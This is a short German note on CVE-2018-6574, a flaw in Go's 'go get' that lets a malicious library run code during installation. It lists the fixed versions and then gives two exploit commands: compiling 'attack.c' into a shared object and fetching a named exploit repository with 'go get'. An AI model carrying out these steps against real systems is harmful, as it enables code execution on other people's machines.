
CVE-2018-6574 Diese Sicherheitslücke betrifft den Golang-Befehl 'go get' und ermöglicht es einem Angreifer, durch die Installation einer bösartigen Bibliothek Codeausführung auf einem System zu erlangen. Diese Sicherheitslücke wurde in Go 1.8. 7, 1.9. 4 und 1.10rc2 behoben. Golang baut native Erweiterungen.
gcc -shared -o attack.so -fPIC attack.c
go get github.com/zerbaliy3v/cve-2018-6574-exploit